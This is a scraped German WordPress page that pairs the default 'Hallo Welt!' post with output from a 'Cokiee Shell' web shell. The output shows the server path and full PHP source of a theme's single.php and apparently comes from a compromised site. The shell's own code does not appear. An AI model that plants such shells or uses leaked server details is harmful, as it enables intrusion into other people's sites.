Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /var/www/web284/html/wp-content/themes/splendor/ |
Current File : //var/www/web284/html/wp-content/themes/splendor/single.php |
<?php /* Default Post Template */ get_header(); ?> <?php $title = get_the_title(); if ( $title == "Post + Left Sidebar") $data['blog_sidebar_position'] = "Left Sidebar"; ?> <div class="main_content_area blog_item_page"> <div class="container"> <div class="row"> <?php if ($data['blog_sidebar_position'] == "Left Sidebar") { ?> <!--Sidebar--> <div class="span3 blog_sidebar left"> <?php if ( !function_exists('dynamic_sidebar') || !dynamic_sidebar("Blog Sidebar") ) : ?> <?php endif; ?> </div> <!--/Sidebar--> <?php } ?> <!--Page contetn--> <div class="span9"> <div class="blog_item blog_item_long"> <?php if ( have_posts() ) : while ( have_posts() ) : the_post(); ?> <?php get_template_part( 'framework/post-format/single', get_post_format() ); ?> <?php endwhile; ?> <?php endif; ?> <?php if($data['blog_post_show_author'] == true ) { ?> <div class="row-fluid"> <div class="span12"> <div class="blog_author_item_description"> <img class="img-polaroid" src="<?php echo stripslashes($data['blog_post_show_author_avatar']) ?>" alt="<?php bloginfo('name'); ?>" /> <h5 style="margin-bottom:5px;font-weight:600 !important;"><?php echo $data['blog_post_show_author_header']; ?></h5> <?php the_author_meta('description'); ?> <div class="clearfix"></div> </div><!--end author-bio--> </div> </div> </div> <?php } ?> <div class="row"> <div class="span9"> <div class="comments_div" style="margin-top:60px;"> <h4 class="small_width" style="margin-bottom:-20px;"><?php comments_number('0','1','%')?><?php _e(" comment(s)","splendor"); ?></h4> <?php comments_template(); ?> </div> </div> </div> </div> <!--/Page contetn--> <?php if ($data['blog_sidebar_position'] == "Right Sidebar") { ?> <!--Sidebar--> <div class="span3 blog_sidebar"> <?php if ( !function_exists('dynamic_sidebar') || !dynamic_sidebar("Blog Sidebar") ) : ?> <?php endif; ?> </div> <!--/Sidebar--> <?php } ?> </div> </div> </div> <?php get_footer(); ?>
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare